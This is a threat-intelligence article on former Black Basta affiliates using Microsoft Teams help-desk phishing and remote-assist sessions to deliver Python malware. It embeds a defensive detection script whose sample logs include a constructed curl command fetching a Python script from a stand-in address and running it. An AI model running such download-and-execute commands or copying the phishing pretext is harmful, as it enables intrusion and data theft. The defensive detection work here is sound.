
Former Black Basta Affiliates Resurface with Microsoft Teams Phishing and Python Malware in 2025
Former members of the Black Basta ransomware group are making a comeback with familiar—yet increasingly sophisticated—tactics, including Microsoft Teams phishing and Python-based malware delivery.
According to a report by ReliaQuest, these threat actors are now executing malicious Python scripts via cURL requests to drop payloads, expanding on their traditional strategy of email spamming and Teams-based social engineering.
Between February and May 2025, half of all Teams phishing attempts originated from onmicrosoft[.]com domains. Additionally, 42% of the attacks came from previously breached domains—allowing attackers to impersonate legitimate communications and slip past defenses.
Sectors Targeted: Finance, Insurance, and Construction
ReliaQuest observed multiple incidents where attackers posed as IT help desk personnel via Teams to lure employees into remote desktop sessions using tools like Quick Assist and AnyDesk. Once inside, they dropped Python scripts from external servers to establish command-and-control (C2).
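The chain described above (external Teams contact from an onmicrosoft.com tenant, a remote-assistance session, then cURL fetching and running a Python script) can be expressed as correlation logic over endpoint and collaboration telemetry. The following is an added detection example, not code from ReliaQuest or from the report; the log record layouts, host names, user names and the 203.0.113.10 address are constructed for illustration, and the 30- and 60-minute correlation windows are assumed tuning values rather than figures from the article.

```python
"""Correlate a Teams-phishing -> remote-assist -> curl/python chain.

Added example; the event schemas below are constructed, not any product's format.
"""
from datetime import datetime, timedelta

# Constructed sample: metadata for external Teams chats received by internal users.
TEAMS_EVENTS = [
    {"ts": "2025-04-02T09:00:00", "sender": "helpdesk@contoso-support.onmicrosoft.com",
     "user": "jdoe", "host": "WS-0142"},
    {"ts": "2025-04-02T09:03:00", "sender": "alice@partner-corp.com",
     "user": "msmith", "host": "WS-0201"},
]

# Constructed sample: process-creation events from endpoint telemetry.
PROCESS_EVENTS = [
    {"ts": "2025-04-02T09:05:00", "host": "WS-0142", "image": "quickassist.exe",
     "cmdline": "quickassist.exe"},
    {"ts": "2025-04-02T09:11:00", "host": "WS-0142", "image": "curl.exe",
     "cmdline": "curl.exe -o update.py http://203.0.113.10/update.py"},  # constructed TEST-NET address
    {"ts": "2025-04-02T09:11:05", "host": "WS-0142", "image": "python.exe",
     "cmdline": "python.exe update.py"},
    {"ts": "2025-04-02T09:30:00", "host": "WS-0201", "image": "curl.exe",
     "cmdline": "curl.exe https://updates.example.com/manifest.json"},  # benign: no remote-assist precursor
]

REMOTE_ASSIST_TOOLS = {"quickassist.exe", "anydesk.exe"}
DOWNLOAD_OR_INTERPRETER = {"curl.exe", "python.exe", "pythonw.exe"}


def parse_ts(value):
    return datetime.fromisoformat(value)


def suspicious_teams_senders(events):
    """Return external Teams messages whose sender uses a *.onmicrosoft.com tenant domain.

    Legitimate organisations rarely message partners from their default tenant domain,
    which is why the report singles these domains out.
    """
    hits = []
    for ev in events:
        domain = ev["sender"].rsplit("@", 1)[-1].lower()
        if domain.endswith(".onmicrosoft.com"):
            hits.append(ev)
    return hits


def remote_assist_followed_by_script(process_events, window=timedelta(minutes=30)):
    """Per host, flag curl/python launches within `window` after a remote-assist tool starts."""
    by_host = {}
    for ev in sorted(process_events, key=lambda e: e["ts"]):
        by_host.setdefault(ev["host"], []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        starts = [parse_ts(e["ts"]) for e in evs if e["image"].lower() in REMOTE_ASSIST_TOOLS]
        for ev in evs:
            if ev["image"].lower() not in DOWNLOAD_OR_INTERPRETER:
                continue
            when = parse_ts(ev["ts"])
            if any(start <= when <= start + window for start in starts):
                alerts.append({"host": host, "ts": ev["ts"], "image": ev["image"],
                               "cmdline": ev["cmdline"]})
    return alerts


def correlate(teams_events, process_events, window=timedelta(minutes=60)):
    """Hosts where a suspicious Teams contact precedes the remote-assist -> script chain."""
    chain = remote_assist_followed_by_script(process_events)
    flagged = {}
    for tev in suspicious_teams_senders(teams_events):
        t0 = parse_ts(tev["ts"])
        for alert in chain:
            if alert["host"] == tev["host"] and t0 <= parse_ts(alert["ts"]) <= t0 + window:
                entry = flagged.setdefault(tev["host"], {"sender": tev["sender"], "events": []})
                entry["events"].append(alert)
    return flagged


if __name__ == "__main__":
    for host, detail in correlate(TEAMS_EVENTS, PROCESS_EVENTS).items():
        print(host, "contacted by", detail["sender"])
        for alert in detail["events"]:
            print("   ", alert["ts"], alert["cmdline"])
```

Each stage stands on its own as a weaker signal; the correlation across the same host is what lifts the chain above the noise of ordinary curl or Python use. In production the Teams sender domain, the remote-assist binaries and the windows would come from your own baseline rather than the constants above.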
These tactics mirror past Black Basta strategies but are now being used by newer ransomware gangs, such as BlackSuit, suggesting overlap in membership or adoption of the same techniques.
Likely Alliances: CACTUS and DragonForce
Following the shutdown of Black Basta’s data-leak site, researchers suspect former members have joined or allied with the CACTUS ransomware group—with leaked chats revealing a $500–600K transaction between Black Basta’s leader and CACTUS.
Other affiliates may have migrated to BlackLock, which is rumored to collaborate with a ransomware cartel known as DragonForce.
Malware Evolution: RATs, Google Drive, and Credential Theft
The attackers are using access gained via phishing to deploy advanced Java-based remote access trojans (RATs)—capable of file transfers, SOCKS5 tunneling, credential theft, and in-memory execution via Google Drive and OneDrive.
According to Rapid7, the malware continues to evolve and is now leveraging cloud services from Google and Microsoft to evade detection.
Related Threat Landscape Developments
- Scattered Spider is exploiting MSPs and IT vendors using Evilginx phishing to bypass MFA and align with groups like ALPHV, RansomHub, and DragonForce.
- Qilin/Agenda has launched a campaign using Fortinet FortiGate vulnerabilities like CVE-2024-21762 and CVE-2024-55591.
- The Play ransomware group is exploiting SimpleHelp vulnerabilities (CVE-2024-57727), targeting nearly 900 organizations as of May 2025.
- The VanHelsing group leaked its own ransomware source code due to internal conflicts.
- Interlock has deployed a new Node.js-based RAT called NodeSnake, seen in attacks on UK education and government sectors.
"RATs give attackers persistent access and the ability to deploy further tooling or exfiltrate data," said Quorum Cyber. "They’re increasingly central to maintaining long-term control of compromised environments."
As 2025 unfolds, organizations must be alert to new variants of old tactics—especially in environments using cloud platforms and collaborative tools like Microsoft Teams. The combination of phishing, social engineering, and custom malware is proving to be both effective and dangerously adaptable.